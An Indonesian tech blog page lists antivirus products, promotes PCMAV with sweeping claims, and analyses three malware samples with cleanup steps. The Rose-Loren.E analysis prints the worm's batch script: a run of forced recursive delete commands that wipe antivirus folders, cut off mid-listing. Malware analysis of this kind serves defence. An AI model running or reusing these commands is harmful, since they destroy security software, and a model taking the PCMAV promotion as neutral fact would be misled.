Selamat Datang di Zaputec, Media mini tentang informasi Teknologi , Terima kasih atas kunjungannya.,.,.

Tips dan Triks Berkomputer

Mau lebih banyak dan detail tentang Tips and Tricks Komputer, kunjungi saja dengan meng klik disini

Trik Komputer – Blok Usb Dengan Usb Block

Tips Dan Trik komputer, terlengkap, terbaru, teruptodate 2011, Free download USB Block Rekan – rekan ga suka teman-teman main colok usb di komputer atau laptop rekan-rekan tanpa izin.? Mungkin ada baiknya rekan-rekan mencoba aplikasi yang satu ini.
Aplikasi ini adalah USB BLOCK, fungsi aplikasi ini adalah memblok USB ( flashdisk, dll ), Disk, Netword yang tersambung dengan komputer kita tanpa mendapatkan konfirmasi dari pemilik komputer.
Jadi setiap ada yang mencolokkan flashdik atau hardisk external, komputer atau laptop akan meminta password yang telah kita tentukan. Tapi jangan khawatir, apliksi ini juga memiliki fasilitas untuk mengenali gadget yang sering kita hubungkan, jadi jika kita sudah mengizinkan gadget tersebut tersambung dengan komputer kita, maka aplikasi tidak akan minta password lagi.
Selamat mencoba..,.,

Daftar Antivirus Indonesia Terbaik 2011

Setelah sebelumnya kita membahas antivirus gratis terbaik dari Luar, kini saatnya kita membahas antivirus lokal buatan anak negeri. Sebagaimana kita ketahui bahwa di Luar sana terdapat banyak antivirus gratis yang bagus, sebut saja Avira, Avast, AVG,Panda Antivirus dan sebagainya. Akan tetapi seringkali antivirus tersebut tidak mengenali/mendeteksi virus-virus kreasi anak negeri. Oleh karena itu dibutuhkanantivirus lokal terbaik yang ampuh untuk membasmi virus lokal yang membandel.
Berikut adalah beberapa antivirus lokal terbaik yang bisa anda coba.
 
1. SMADAV
Siapa yang tak kenal dengan antivirus satu ini, dengan kemampuannya merecovery file yang terkena virus dan teknology smart behaviour SMADAV tidak berlebihan diklaim sebagai antivirus lokal terbaik untuk saat ini.
Download : SMADAV Antivirus
 
 
 
2. PCMAV
Antivirus yang dibundle dengan Majalah PCMedia ini bisa dikatakan antivirus yang lengkap, selain dibekali dengan database virus yang update, kemampuannya digabung dengan CLAMAV menjadi nilai tambah yang sangat bagus.
Download : PCMAV
 
 
  
3. ANSAV
Antivirus buatan komunitas anak-anak yogya ini tidak bisa dipandang sebelah mata, dengan tampilannya yang simple, ANSAV mempunyai kemampuan yang setara dengan SMADAV maupun PCMAV. Antivirus ini dilengkapi dengan plugin dan multi bahasa.
Download : ANSAV Antivirus
 
 
 
4. AVIGEN
Antivirus satu ini memang jarang terdengar ditelinga kita, antivirus yang digunakan untuk mencari file-file yang berisi worm, hacktool, exploit script ataupun trojan ini bersifat open source sehingga disamping kita bisa mendownload antivirusnya, kita juga bisa memperoleh source codenya.
Download : AVIGEN Antivirus

Antivirus terbaik DuniaTahun 2011

INFO-KOMPUTER.tkAntivirus adalah penangkal virus atau vaksin dari virus jahat yang hendak merusak komputer kita, maka dari itu bagi anda yang masih menggunakan Operating System (OS) Microsoft Windows maka diwajibkan untuk memakai antivirus, agar komputer anda tidak mengalami gangguan dari serangan virus komputer jahat.
Di dunia ini ada banyak macam antivirus mulai dari buatan dalam negeri Indonesia maupun buatan luar negeri, mulai dari yang gratis sampai yang berbayar semuanya ada, dan bebas terserah anda mau memilih yang mana. Tetapi saya menganjurkan untuk memakai dua antivirus sekaligus dalam satu komputer, yakni antivirus buatan dalam negeri dan yang satunya lagi antivirus buatan dalam negeri.
Disini saya akan memaparkan 10 Ranking Antivirus terbaik di dunia yang akan menjadi persaingan ketat pada tahun 2011, mengingat kualitas dari masing-masing antivirus semakin berkembang dan maju, dengan mengambil sumber dari toptenreviews.com.

1. Bitdefender Antivirus
SPESIFIKASI DAN HARGA:
a) Threat Detection: Virus, Worm, Trojan, Spyware, Malware, Rootkit.
b) Additional Protection: Browser exploit, OS exploit, Keyloggers, inbound email protection, outbond email protection, instant messaging protection, p2p/file sharing, registry startup protection, dialers, backdoors, hackers, phising, identity theft protection, adware, activex, vulnerabilities, cookies, scripts, full web protection, auto usb detect.
c) Protection Technology: Virus signatures, whitelisting, heuristic, real time.
d) Supported OS: XP (32 & 64 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)
e) Price: $ 29.95
>> Download Bitdefender Antivirus

2. Kaspersky Antivirus
SPESIFIKASI DAN HARGA:
a) Threat Detection: Virus, Worm, Trojan, Spyware, Malware, Rootkit.
b) Additional Protection: Browser exploit, OS exploit, Keyloggers, inbound email protection, outbond email protection, instant messaging protection, p2p/file sharing, registry startup protection, dialers, backdoors, hackers, phising, identity theft protection, adware, activex, vulnerabilities, cookies, scripts, full web protection, auto usb detect.
c) Protection Technology: Virus signatures, blacklisting, whitelisting, heuristic, real time, security network.
d) Supported OS: XP (32 & 64 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)
e) Price: $ 59.95
>> Download Kaspersky Antivirus

3. Webroot Antivirus
SPESIFIKASI DAN HARGA:
a) Threat Detection: Virus, Worm, Trojan, Spyware, Malware, Rootkit.
b) Additional Protection: Browser exploit, OS exploit, Keyloggers, inbound email protection, outbond email protection, instant messaging protection, p2p/file sharing, registry startup protection, dialers, hackers, identity theft protection, adware, activex, cookies, scripts, spam.
c) Protection Technology: Virus signatures, blacklisting, whitelisting, heuristic, real time, security network.
d) Supported OS: XP (32 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)
e) Price: $ 29.95
>> Download Webroot Antivirus

4. Norton Antivirus
SPESIFIKASI DAN HARGA:
a) Threat Detection: Virus, Worm, Trojan, Spyware, Malware, Rootkit.
b) Additional Protection: Browser exploit, OS exploit, inbound email protection, outbond email protection, instant messaging protection, registry startup protection, dialers, backdoors, hackers, identity theft protection, adware, activex, vulnerabilities, scripts, full web protection, auto usb detect.
c) Protection Technology: Virus signatures, blacklisting, whitelisting, heuristic, real time, security network.
d) Supported OS: XP (32 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)
e) Price: $ 39.99
>> Download Norton Antivirus

5. ESET Nod32 Antivirus
SPESIFIKASI DAN HARGA:
a) Threat Detection: Virus, Worm, Trojan, Spyware, Malware, Rootkit.
b) Additional Protection: Keyloggers, inbound email protection, outbond email protection, registry startup protection, dialers, backdoors, adware, activex, vulnerabilities, scripts, full web protection, auto usb detect.
c) Protection Technology: Virus signatures, blacklisting, whitelisting, heuristic, real time, security network.
d) Supported OS: XP (32 & 64 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)
e) Price: $ 39.99
>> Download ESET NOD32 Antivirus  



 6. AVG Antivirus
SPESIFIKASI DAN HARGA:
a) Threat Detection: Virus, Worm, Trojan, Spyware, Malware, Rootkit.
b) Additional Protection: Browser exploit, OS exploit, Keyloggers, inbound email protection, outbond email protection, instant messaging protection, p2p/ file sharing protection, registry startup protection, dialers, backdoors, hackers, phising, identity theft protection, adware, activex, vulnerabilities, cookies, scripts, full web protection, spam, auto usb detect.
c) Protection Technology: Virus signatures, blacklisting, whitelisting, heuristic, real time, security network.
d) Supported OS: XP (32 & 64 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)
e) Price: $ 34.99
>> Download AVG Antivirus
7. G Data Antivirus
SPESIFIKASI DAN HARGA:
a) Threat Detection: Virus, Worm, Trojan, Spyware, Malware, Rootkit.
b) Additional Protection: Browser exploit, OS exploit, inbound email protection, outbond email protection, instant messaging protection, registry startup protection, dialers, backdoors, hackers, phising, identity theft protection, adware, scripts, full web protection,.
c) Protection Technology: Virus signatures, blacklisting, whitelisting, heuristic, security network.
d) Supported OS: XP (32 & 64 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)
e) Price: $ 29.95
>> Download G Data Antivirus 

8. Avira Antivir
SPESIFIKASI DAN HARGA:
a) Threat Detection: Virus, Worm, Trojan, Spyware, Malware, Rootkit.
b) Additional Protection: Browser exploit, OS exploit, inbound email protection, outbond email protection, registry startup protection, dialers, backdoors, phising, adware, activex, scripts, full web protection.
c) Protection Technology: Virus signatures, heuristic, real time, security network.
d) Supported OS: XP (32 & 64 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)
e) Price: $ 26.95
>> Download Avira Antivir


9. Vipre Antivirus
SPESIFIKASI DAN HARGA:
a) Threat Detection: Virus, Worm, Trojan, Spyware, Malware, Rootkit.
b) Additional Protection: Browser exploit, OS exploit, Keyloggers, inbound email protection, outbond email protection, instant messaging protectionp2p/file sharing, registry startup protection, dialers, backdoors, hackers, phising, adware, activex, vulnerabilities, cookies, scripts, auto usb detect.
c) Protection Technology: Virus signatures, blacklisting, whitelisting, heuristic, real time, security network.
d) Supported OS: XP (32 & 64 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)
e) Price: $ 29.95
>> Download Vipre Antivirus

10. Trend Micro Titanium Antivirus
SPESIFIKASI DAN HARGA:
a) Threat Detection: Virus, Worm, Trojan, Spyware, Malware, Rootkit.
b) Additional Protection: OS exploit, Keyloggers, inbound email protection, outbond email protection, instant messaging protection, registry startup protection, dialers, hackers, identity theft protection, adware, activex, vulnerabilities, cookies, scripts, auto usb detect.
c) Protection Technology: Virus signatures, blacklisting, whitelisting, real time, security network.
d) Supported OS: XP (32 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)
e) Price: $ 39.95

>> Download Trend Micro Titanium Antivirus


PCMAV dan PC Media

PC Media Antivirus (PCMAV) merupakan satu-satunya antivirus di dunia yang mengandung formula dan teknologi khusus yang unik dan tangguh untuk mengatasi virus komputer yang menyebar luas di Indonesia, baik jenis lokal maupun mancanegara (asing), secara akurat dan tuntas hingga pulih 100%.
Berbeda dengan antivirus sejenis, setiap virus yang ada di database PCMAV masing-masing memiliki removal engine-nya sendiri, sehingga virus dapat dibasmi dan dibersihkan secara tuntas hingga ke “akar-akarnya” tanpa kompromi! Removal engine ini juga dirancang untuk bekerja secara hati-hati dan dengan tingkat keamanan yang sangat tinggi, tujuannya agar sistem/file/dokumen penting Anda yang terserang virus dapat dipulihkan secara sempurna tanpa khawatir risiko kehilangan atau kerusakan pada file/sistem. Silahkan buktikan sendiri keampuhan removal engine PCMAV dengan antivirus yang biasa Anda gunakan.
Selain menggunakan engine antivirus-nya sendiri, PCMAV juga dapat menggunakan engine dari ClamAV sebagai plug-in untuk memperkuat hasil pendeteksian hingga 700.000 virus lebih. Tim engineer PCMAV pun secara meyakinkan berhasil menemukan dan mengembangkan sendiri berbagai teknologi antivirus baru nan-handal untuk mengatasi dan menjaga sistem Anda dari gangguan virus komputer.
Dikembangkan secara intensif oleh PC Media, majalah komputer terbesar dan terlaris di Indonesia, serta didukung luasnya jaringan distribusi Pinpoint Publications, PCMAV telah dipercaya oleh ratusan ribu komputer pembaca setia dan pecinta majalah PC Media di nusantara. Ini belum termasuk pengguna yang mempercayai PCMAV di luar pembaca PC Media yang bebas menggunakan PCMAV, yang kami duga jumlahnya mencapai jutaan komputer di Indonesia.
Jadi, mulai sekarang, percayakan selalu penanganan virus, worm maupun trojan yang menyerang komputer Anda hanya kepada PCMAV. Dapatkan versi terbarunya hanya di majalah PC Media edisi terbaru, terbit tiap bulan.

SystemTools: Remove All Spyware from Your PC

SystemTools
SystemTools. Beberapa hari yang lalu, sebagian user di kagetkan dengan adanya aplikasi SystemTools yang tanpa mereka sadari aplikasi tersebut adalah “FakeAntivirus” atau “Antivirus Palsu”. Malware sejenis pernah di bahas pada postingan sebelumnya yang berjudul FakeAV-Downloader.G. Laporan di dapat dari user yang mendownload salah satu antivirus lokal dari website resminya yang kemudian justru menjalankan antivirus palsu.

A. Info Malware
Nama: SystemTools
Asal: Belum diketahui
Ukuran File: 397 KB (407,040 bytes)
Packer: -
Pemrograman: Visual C++
Icon: Random
Tipe: Trojan
B. Tentang Malware
Awalnya, kami mendapat laporan mengenai user yang mendapat pesan di Facebook dan isinya adalah sebuah link yang jika dibuka maka akan mendownload sebuah file dengan nama surprise.exe. Setelah file tersebut di jalankan, user merasakan keanehan yang terjadi pada komputernya. Contohnya seperti Firefox tidak bisa di buka, juga Task Manager dan beberapa file aplikasi lainnya.
Selain beberapa aplikasi tidak bisa di buka, wallpaper pada desktop komputer user berubah seperti pada gambar berikut.
Wallpaper SystemTools
Malware tipe Trojan ini mengingatkan kita pada salah satu virus yang sempat menghebohkan Indonesia yaitu Windx-Maxtrox pada tahun 2008 yang juga mengubah desktop. Kesuksesan SystemTools ini menyebar di indonesia adalah:
1. Menyebar melalui Facebook dan salah satu website yang menyediakan fasilitas download gratis.
2. Pada saat pengguna mengunduh SystemTools ini dari Internet, beberapa antivirus luar negeri belum ada yang mendeteksinya sebagai malware.
Exeinfo PE
Dibuat menggunakan C++ tanpa di-pack, malware ini juga memiliki keistimewaan lain. Yaitu kemampuan untuk merubah DateTimeStamp pada informasi headernya. Sehingga hash MD5nya selalu berubah meskipun ukuran filenya sama.
DateTimeStamp
Harga antivirus palsu ini juga tidak tanggung-tanggung.
1 tahun lisensi: $ 59.95
2 tahun lisensi: $ 69.95
Lifetime lisensi: $ 79.95
Lifetime premium support: $ 19.95
C. Companion/File yang dibuat
Setelah aktif di memory, system tools akan membuat beberapa file seperti:
1. Membuat file [nama acak].tmp yang sebenarnya adalah file gambar (BMP / Bitmap) dan nantinya akan dijadikan wallpaper dekstop pada folder C:\Documents and Settings\[nama user]\Local Settings\Temp

2. Membuat file yang akan di jalankan setelah startup dengan nama acak dan file lain tanpa ekstensi pada folder C:\Documents and Settings\All Users\Application Data\[folder dengan nama acak]
D. Hasil Infeksi
Setelah aktif di memory, malware ini akan memblok setiap file aplikasi, kecuali file dengan nama file system seperti pada gambar di bawah:
Aplikasi yang di-blok
Malware juga memunculkan pesa-pesan palsu seperti gambar berikut:
False Warning 1
False Warning 2
Selain menampilkan wallpaper yang berubah seperti yang telah ditampilkan sebelumnya, malware juga terkadang menampilkan pesan Blue Screen Of Death (BSOD) yang menandakan seolah olah sistem komputer sudah benar-benar rusak.
BSOD
Memaksa user untuk melakukan registrasi agar mendapatkan kode aktivasi dan membersihkan semua malware yang di laporkan oleh SystemTools.
Activation
Agar bisa berjalan saat startup, SystemTools membuat value registry baru di:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\[nama acak], “C:\Documents and Settings\All Users\Application Data\[nama folder aca]\[nama acak].exe”
E. Pembersihan
Untuk pembersihan, dapat dilakukan dengan 2 cara. Yaitu dengan cara manual dan cara langsung menggunakan PCMAV.
Cara manual:
1.Cari file task manager (taskmgr.exe) yang terdapat pada folder
C:\WINDOWS\system32\taskmgr.exe
Step 1
2.Copy file tersebut ke My Documents, dengan klik kanan lalu pilih menu
Send to My Documents.
3.Buka folder My Documents, kemudian Rename file “taskmgr.exe” menjadi “Explorer.exe” dan jalankan file tersebut, maka akan tampil Task Manager.
Step 2
4.Cari proses dengan nama aneh misalnya “eImHbDk02400.exe” kemudian kill proses tersebut (End Process).
Step 3
5.Buka Windows Explorer, aktifkan fungsi “Show Hidden Files and Folders” pada “Folder Options” dengan memilih menu Tools – Folder Options – View, pilih Show Hidden Files and Folders, lalu klik OK.
Step 4
6. Masuk ke folder “C:\Documents and Settings\All Users\Application Data” cari dan hapus folder dengan nama aneh, misalnya “eImHbDk02400″ yang di dalamnya terdapat file dari SystemTools.
Step 5
7. (Opsional, jika boleh dilakukan atau tidak masalah jika tidak dilakukan) Masuk ke folder “C:\Documents and Settings\[nama user]\Local Settings\Temp“, cari dan hapus file Temporary (tmp) yang ukurannya tidak wajar (2MB ~ ) karena file tersebut adalah file bitmap yang dijadikan wallpaper pada desktop user yang terinfeksi.
Step 6
8.Aktifkan Kembalikan fungsi “Do not show hidden files and folders“.
Pilih menu Tools – Folder Options – View, pilih “Do not show hidden files and folders“, dan klik OK.
Step 7
9.Log Off Komputer.
10.Komputer kembali normal.
Pembersihan menggunakan PCMAV:
Jalankan PCMAV dan scan seperti biasa dan lakukan scan menyeluruh.
Deteksi
PCMAV 4.7 Update Build3
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 4.7 Update Build3 telah hadir dengan penambahan 120 pengenal varian virus baru. Bagi Anda pengguna PCMAV 4.7, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:
SendSpace.com
ZippyShare.com (mirror)
Rapidshare.com (mirror)
Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.
Daftar tambahan virus hingga PCMAV 4.7 Update Build3:
Aksika-Indramayu
Aksika-Indramayu.txt
AlamarPica.vbs
Angelo.G
Angelo.G.host
AnitaLoroaji
AnitaLoroaji.inf
Autoit-Arif
Autoit-Cyrillic
Autoit-ReplaceIcon.D
Autoit-ReplaceIcon.E
Autoit-ReplaceIcon.F
Autoit.FD
Autoit.FD.ini
Autoit.FE
Autoit.FE.serv
Bajigur.vbs
Bajigur.vbs.bat
Bajigur.vbs.host
Bajigur.vbs.inf
Bali.B
Batam
Batam-BlackRider
Batam-BlackRider.inf
Batam.inf
BlackLove.E
CintaFitri.B
CintaFitri.B.inf
Cobax.exe.C
CoolStory
DarkWar
Dhoos
Dhoos.dll
Dhoos.url.A
Dhoos.url.B
Dhoos.url.C
DirLock.C
DirLock.C.host
Enigma
FakeAV
FakeAV-Downloader.K
FakeAV-Downloader.K.dat
FakeAV-Downloader.K.dll.A
FakeAV-Downloader.K.dll.B
FakeAV-Downloader.K.dll.C
FakeAV-Downloader.K.job
FakeAV-Downloader.K.lnk.A
FakeAV-Downloader.K.lnk.B
FakeAV-Downloader.K.lnk.C
FakeAV-Downloader.K.lnk.D
FakeAV-Downloader.K.ref
FakeAV-Downloader.K.rtf
FakeAV-Downloader.K.setup
FakeAV-Downloader.K.unins
FakeAV-Downloader.K.url
Fakhricker.vbs
FeSilva.vbs
FeSilva.vbs.inf
FnI-DiaryMimi.vbs
FnI-DiaryMimi.vbs.inf
Gabest.B
GavGent-HVM31
GrepoZipTsunami.vbs
GrepoZipTsunami.vbs.inf
GXRG-Snow.vbs
GXRG-Snow.vbs.host
GXRG-Snow.vbs.inf
GXRG.vbs
GXRG.vbs.inf
H323
H323.bat
Halted
IsroCiremai
IyanHapacker
JonBennett
JonBennett.inf
KefiUnique.vbs
KefiUnique.vbs.txt
KefiUnique.vbs.upd
Lz32.vbs.B
Lz32.vbs.C
Ossep.vbs
Ossep.vbs.inf
RadimPicha
RadimPicha.dll
RadimPicha.inf
RadimPicha.pass
Ramnit.A.Variant
Ramnit.B.Variant
Ramnit.C.Variant
Ramnit.D.Variant
Ramnit.E.Variant
Ramnit.F.variant
Recycler.BO
Recycler.BO.dll
Ronkor.C
Ronkor.C.htt
Ronkor.C.txt
Rose-Loren.E
Serviks.vbs.C
Serviks.vbs.C.doc
Serviks.vbs.C.host
SystemTools
Temps
Temps.INF
TripleExe
TripleExe.inf
VB-Shortcut-1.lnk
VBVN
ViewFiles
XSample.vbs
XSample.vbs.inf
XSample.vbs.ini
XSample.vbs.lnk.A
XSample.vbs.lnk.B
XSample.vbs.lnk.C
XSample.vbs.lnk.D
XSample.vbs.lnk.E
XSample.vbs.lnk.F
XSample.vbs.mp3

ViewFiles: ALABAMA

ViewFile
Alabama. Awalnya kami pikir ini hanyalah worm yang sama seperti VB-Shortcut karena menggunakan icon standar aplikasi Visual Basic. Namun setelah kami coba melakukan analisa lebih jauh, rupanya karakteristik worm ini berbeda dengan VB-Shortcut. Terdapat string “ALABAMA” yang terdapat dalam tubuh worm ViewFiles. Apakah mengindikasikan worm ini berasal dari Alabama?

A. Info Malware
Nama: ViewFiles
Asal: kemungkinan dari Alabama
Ukuran File: 168 KB (172,032 bytes)
Packer : -
Pemrograman : Visual Basic
Icon : Aplikasi Visual Basic
Tipe : Worm
B. Tentang Malware
Selain shortcut yang sedang ramai dibuat oleh beberapa worm belakangan ini, icon aplikasi Visual Basic juga menjadi salah satu ciri worm yang mulai banyak di laporkan sejak Agustus 2010 kemarin. Begitu juga yang dilakukan olah pembuat worm ViewFiles. Namanya diambil dari nama induknya yang menyebar di flash disk dan diberi nama ViewFiles.exe.
C. Companion/File yang dibuat
Pada komputer yang terinfeksi, worm ViewFiles akan membuat file autorun dan file companion pada flash disk yang nantinya akan di panggil oleh autorun.
Induk ViewFile
Isi dari autorun akan selalu berubah seperti contoh di bawah ini, hal ini di maksudkan untuk mengecoh pendeteksian oleh antivirus akan tetapi beberapa penting bagian tidak pernah dirubah oleh worm ini.
Autorun ViewFile
D. Hasil Infeksi
Worm ViewFiles akan bersembunyi di dalam folder RECYCLER dan membuat folder yang hampir sama seperti isi folder RECYCLER seperti gambar di bawah.
ViewFile
Agar bisa berjalan saat startup, worm ini membuat key dengan nama Taksman pada:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Taskman

Startup
E. Pembersihan
Mulai PCMAV 4.7 Update Build2, ViewFiles beserta file-file companionnya telah dapat dikenali dan dibersihkan dari sistem komputer Anda.
Detected
PCMAV 4.7 Update Build2
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 4.7 Update Build2 telah hadir dengan penambahan 98 pengenal varian virus baru. Bagi Anda pengguna PCMAV 4.7, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:
SendSpace.com
ZippyShare.com (mirror)
Rapidshare.com (mirror)
Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.
Daftar tambahan virus hingga PCMAV 4.7 Update Build2:
Aksika-Indramayu
Aksika-Indramayu.txt
AlamarPica.vbs
Angelo.G
Angelo.G.host
AnitaLoroaji
AnitaLoroaji.inf
Autoit-Arif
Autoit-Cyrillic
Autoit-ReplaceIcon.D
Autoit-ReplaceIcon.E
Autoit-ReplaceIcon.F
Autoit.FD
Autoit.FD.ini
Autoit.FE
Autoit.FE.serv
Batam
Batam.inf
Cobax.exe.C
Dhoos
Dhoos.dll
Dhoos.url.A
Dhoos.url.B
Dhoos.url.C
DirLock.C
DirLock.C.host
FakeAV
FakeAV-Downloader.K
FakeAV-Downloader.K.dat
FakeAV-Downloader.K.dll.A
FakeAV-Downloader.K.dll.B
FakeAV-Downloader.K.dll.C
FakeAV-Downloader.K.job
FakeAV-Downloader.K.lnk.A
FakeAV-Downloader.K.lnk.B
FakeAV-Downloader.K.lnk.C
FakeAV-Downloader.K.lnk.D
FakeAV-Downloader.K.ref
FakeAV-Downloader.K.rtf
FakeAV-Downloader.K.setup
FakeAV-Downloader.K.unins
FakeAV-Downloader.K.url
Fakhricker.vbs
FeSilva.vbs
FeSilva.vbs.inf
FnI-DiaryMimi.vbs
FnI-DiaryMimi.vbs.inf
Gabest.B
GavGent-HVM31
GrepoZipTsunami.vbs
GrepoZipTsunami.vbs.inf
GXRG-Snow.vbs
GXRG-Snow.vbs.host
GXRG-Snow.vbs.inf
GXRG.vbs
GXRG.vbs.inf
H323
H323.bat
Halted
KefiUnique.vbs
KefiUnique.vbs.txt
KefiUnique.vbs.upd
Lz32.vbs.B
Lz32.vbs.C
Ossep.vbs
Ossep.vbs.inf
Ramnit.A.Variant
Ramnit.B.Variant
Ramnit.C.Variant
Ramnit.D.Variant
Ramnit.E.Variant
Ramnit.F.variant
Recycler.BO
Recycler.BO.dll
Ronkor.C
Ronkor.C.htt
Ronkor.C.txt
Rose-Loren.E
Serviks.vbs.C
Serviks.vbs.C.doc
Serviks.vbs.C.host
Temps
Temps.INF
TripleExe
TripleExe.inf
VB-Shortcut-1.lnk
VBVN
ViewFiles
XSample.vbs
XSample.vbs.inf
XSample.vbs.ini
XSample.vbs.lnk.A
XSample.vbs.lnk.B
XSample.vbs.lnk.C
XSample.vbs.lnk.D
XSample.vbs.lnk.E
XSample.vbs.lnk.F
XSample.vbs.mp3

Virus Lokal Rose-Loren.E:"Rose' Ada karena 'Cinta'

Rose-Loren.E
Rose-Loren.E. Tidak selamanya dunia malware itu terkesan hitam dan jahat. Karena Rose-Loren dan salah satu variannya yang di bahas kali ini lebih mengesankan kepiluan serta rasa kesedihan yang dirasakan oleh pembuatnya. Jika bunga mawar umumnya mencirikan perasaan cinta, Rose-Loren membuat bunga mawar sebagai tanda kedatangannya.

A. Info Malware
Nama: Rose-Loren.E
Asal: Indonesia
Ukuran File: 91.7 KB (93,961 bytes)
Packer : Unknown
Pemrograman : Visual Basic
Icon : Folder Windows
Tipe : Worm
B. Tentang Malware
Sepertinya ini adalah hasil dari modifikasi dari source terdahulu karena sudah cukup lama kami mendapatkan variant dari Rose-Loren. eSetelah di unpack, worm ini berukuran 216 KB (221,696 bytes). Saat worm ini aktif di memory, komputer akan terasa lambat karena proses Rose-Loren.E menyita resource yang cukup besar.
C. Companion/File yang dibuat
Saat aktif, worm akan mencari setiap drive yang ditemukan dan membuat file/folder antara lain sebagai berikut:
  • Membuat file yang merupakan file induk/host dari worm, yaitu
    C:\WINDOWS\system32\[5 buah bilangan acak]\lsass.exe dan
    C:\WINDOWS\system32\[5 buah bilangan acak]\svchost.exe
  • Membuat juga file dengan nama EpIoler dan autoexec.bat di folder yang sama seperti di atas, dan isinya adalah:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    del /f /q /s  C:\ESET\*.* >nul
    del /f /q /s  C:\antivi~1\*.* >nul
    del /f /q /s  C:\antivi~2\*.* >nul
    del /f /q /s  C:\antiviru\*.* >nul
    del /f /q /s  C:\avg\*.* >nul
    del /f /q /s  C:\kasper~1\*.* >nul
    del /f /q /s  C:\kasper~2\*.* >nul
    del /f /q /s  C:\mcafee\*.* >nul
    del /f /q /s  C:\mcafee.com\agent\*.* >nul
    del /f /q /s  C:\mcafee.com\*.* >nul
    del /f /q /s  C:\mcafee.com\VSO\*.* >nul
    del /f /q /s  C:\mcafee~1\*.* >nul
    del /f /q /s  C:\msav\*.* >nul
    del /f /q /s  C:\norman\*.* >nul
    del /f /q /s  C:\norton~1\*.* >nul
    del /f /q /s  C:\norton~2\*.* >nul
    del /f /q /s  C:\pav\*.* >nul
    del /f /q /s  C:\pccill~1\*.* >nul
    del /f /q /s  C:\iolo\*.* >nul
    del /f /q /s  C:\progra~1\ESET\*.* >nul
    del /f /q /s  C:\progra~1\antivi~1\*.* >nul
    del /f /q /s  C:\progra~1\antivi~2\*.* >nul
    del /f /q /s  C:\progra~1\avg\*.* >nul
    del /f /q /s  C:\progra~1\kasper~1\*.* >nul
    del /f /q /s  C:\progra~1\kasper~2\*.* >nul
    del /f /q /s  C:\progra~1\mcafee\*.* >nul
    del /f /q /s  C:\progra~1\McAfee.com\agent\*.* >nul
    del /f /q /s  C:\progra~1\McAfee.com\\*.* >nul
    del /f /q /s  C:\progra~1\McAfee.com\VSO\*.* >nul
    del /f /q /s  C:\progra~1\mcafee~1\*.* >nul
    del /f /q /s  C:\progra~1\mindso~1\*.* >nul
    del /f /q /s  C:\progra~1\norman\*.* >nul
    del /f /q /s  C:\progra~1\norton~1\*.* >nul
    del /f /q /s  C:\progra~1\norton~2\*.* >nul
    del /f /q /s  C:\progra~1\pandas~1\*.* >nul
    del /f /q /s  C:\Progra~1\Alwils~1\*.* >nul
    del /f /q /s  C:\progra~1\iolo\*.* >nul
    del /f /q /s /a:h  C:\ESET\*.* >nul
    del /f /q /s /a:h  C:\antivi~1\*.* >nul
    del /f /q /s /a:h  C:\antivi~2\*.* >nul
    del /f /q /s /a:h  C:\antiviru\*.* >nul
    del /f /q /s /a:h  C:\avg\*.* >nul
    del /f /q /s /a:h  C:\kasper~1\*.* >nul
    del /f /q /s /a:h  C:\kasper~2\*.* >nul
    del /f /q /s /a:h  C:\mcafee\*.* >nul
    del /f /q /s /a:h  C:\mcafee.com\agent\*.* >nul
    del /f /q /s /a:h  C:\mcafee.com\VSO\*.* >nul
